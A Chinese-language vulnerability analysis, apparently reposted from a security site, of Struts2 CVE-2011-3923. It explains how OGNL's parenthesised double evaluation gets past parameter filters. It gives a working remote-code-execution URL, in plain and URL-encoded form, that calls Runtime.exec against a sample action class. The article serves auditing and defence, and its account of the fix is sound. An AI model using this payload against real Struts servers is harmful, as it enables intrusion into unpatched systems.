在Ognl表达式中,会将被括号“()”包含的变量内容当做Ognl表达式执行。Ognl表达式的这一特性,引发出一种新的攻击思路。通过将恶意代码存储到变量中,然后在调用Ognl表达式的函数中使用这个变量来执行恶意的代码,从而实现攻击。
本文将会以CVE-2011-3923漏洞作为示例,描述这种利用思路的具体过程。但是,本文的内容绝不仅仅局限于这个漏洞,在实际的审计过程中,这种思路可以用来发现很多类似的漏洞。
二、背景介绍与原理分析
这个漏洞和CVE-2010-1870很相似,都是是通过Ognl表达式执行java,来达到远程代码执行的效果。我们先来回顾下CVE-2010-1870漏洞,它是攻击者通过get方法提交Ognl表达式,直接来调用java的静态方法来实现代码执行。这个问题爆出来后,struts官方加强了对于用户提交内容的审核,禁止使用“#”、“\”等特殊字符作为参数提交。
那么这样我们就没有办法远程执行Ognl表达式了吗?当然不,Ognl给我们提供了另一种执行它的方法,我们来看下官方文档中一部分的内容:
For example, this expression
#fact(30H)
looks up the fact variable, and interprets the value of that variable as an OGNL expression using the BigInteger representation of 30 as the rootobject. See below for an example of setting the fact variable with an expression that returns the factorial of its argument. Note that there is an ambiguity in OGNL's syntax between this double evaluation operator and a method call. OGNL resolves this ambiguity by calling anything that looks like a method call, a method call. For example, if the current object had a fact property that held an OGNL factorial expression, you could not use this approach to call it
fact(30H)
because OGNL would interpret this as a call to the fact method. You could force the interpretation you want by surrounding the property reference by parentheses:
(fact)(30H)
Ognl表达式给我们提供了“#fack()”这样调用上下文对象方法的功能,我们需要留意的是红色文字,大概的意思如下:如果你想要调用上下文环境中对象的方法,可以使用“(fact)()”这种格式来书写。
而在测试过程中发现,(one)(two)这种形式的Ognl表达式,会先将one当做另一个Ognl表达式先执行一遍,然后再继续他后面的工作。这样的话,如果程序在调用某一可以执行Ognl表达式的函数时,我们通过变量将恶意的表达式传入,那么,struts所做的那些过滤便成为了一扇“透明的门”。
三、实例模拟与跟踪
在正常的调用中,我们找到了setValue这个函数,它的作用是根据Ognl表达式对目标进行赋值,在这个过程中Ognl表达式会执行。而struts2中通过在继承ActionSupport的类中,设置setter和getter方法,可以实现用户通过get和post方法直接为私有成员变量赋值。这种方法便会用到setValue这个函数。下面我们来搭建一个这样的类:
package action;
import ognl.Ognl;
import com.opensymphony.xwork2.ActionSupport;
public class HelloWorld extends ActionSupport{
private String tang3;
public void settang3(String tang3) {
this.tang3 = tang3;
}
public String gettang3() {
return tang3;
}
public String execute() throws Exception {
System.out.println(tang3);
return SUCCESS;
}
}
上面的这段代码只是简单的实现了接受参数“tang3”,并将它的内容打印到控制台中的功能。在跟踪它的过程中发现,用户提交的参数时,会通过调用com.opensymphony.xwork2.interceptor.ParametersInterceptor这个类中的set Parameters方法来获取参数,而这个方法会调用setValue函数,代码如下:
if (acceptableName) {
Object value = entry.getValue();
try {
stack.setValue(name, value); //红色字体
} catch (RuntimeException e) {
注意红色字体部分,name参数是Ognl表达式部分,value是被赋值的对象,而之前的CVE-2010-1870漏洞,也是通过这个函数执行的Ognl表达式。下面我们来看下如何结合前面讲到的内容来让这个函数执行我们需要的Java代码。
按照之前我们所说的Ognl表达式特性,我们应该构造这样的url:
/helloword.acton?tang3=<OGNL statement>&(tang3)('meh')=1
提交这样的url后,web server将会做两件事,第一,将Ognl表达式内容存进了tang3变量中;第二,名为(tang3)('meh')的http参数将会被当做另一个Ognl表达式执行,并且action属性tang3将会从action中恢复内容,即变成了(<OGNL statement>)(‘meh’)。
因为http参数传入到变量中会自动进行url解码,那么我们便可以使用url编码“#”这样的特定字符,来绕过正则表达式的过滤。
在构造语句中还需要注意的一点就是,我们要确保tang3属性中的内容先被执行。所以这里需要一个小技巧,在提交参数时,使用z[(tang3)(‘meh’)]=1这种形式的参数,可以确保tang3变量被首先执行。下面我们构造一条可以弹出计算器的url:
/helloworld.action?tang3=(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]=true, @java.lang.Runtime@getRuntime().exec('calc'))(meh)&z[(tang3)('meh')]=1
url编码后:
/helloworld.action?tang3=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess["allowStaticMethodAccess"]%3dtrue,%[email protected]@getRuntime%28%29.exec%28%27calc%27%29%29%28meh%29&z[%28tang3%29%28%27meh%27%29]=1
效果如下图:
从最下面的红色框中,我们可以看出,控制台打印出的tang3变量的内容,就是我们刚才输入的代码。
四、总结
1. 这个漏洞的利用方法,存在局限性,目标代码需要有一个私有成员变量可以直接通过http参数赋值。同时,攻击者需要知道这个私有成员的名字。不过从代码审计的角度来看,可以很容易发现这种问题。但是,由于大部分使用struts框架搭建的网站都是闭源的,导致很难进行白盒测试。
2. 这个问题在struts2.3.1.2版本之后便已经修复了,官方补丁的修复原文如下:
The regex pattern inside the ParameterInterceptor was changed to provide a more narrow space of acceptable parameter names.
Furthermore the new setParameter method provided by the value stack will allow no more eval expression inside the param names.
修复方法就是,进一步减少ParameterInterceptor中白名单包含的内容,并且禁止参数名执行正则表达式
3. Ognl表达式的强大,能够明显的从struts所爆出的这些漏洞中看出。只要存在调用Ognl表达式的函数,都有可能出现代码执行问题。我在之前的《Struts2漏洞浅析之Ongl代码执行分析》一文中,称findValue为struts中的eval函数,明显的有些狭隘了。Ognl表达式才称得上是eval函数,在代码的编写的过程中要小心的处理它的表达式。
4. 再次重申在本文开始处所强调的,这篇文章并不仅仅局限于CVE-2011-3923这个漏洞,而且,它已经被修补了。本文的目的是,希望读者能够通过这个漏洞,了解到通过括号包裹变量,执行Ognl表达式这个特性,以此为我们在日后的审计增加一个思路。
http://netsecurity.51cto.com/art/201212/372912.htm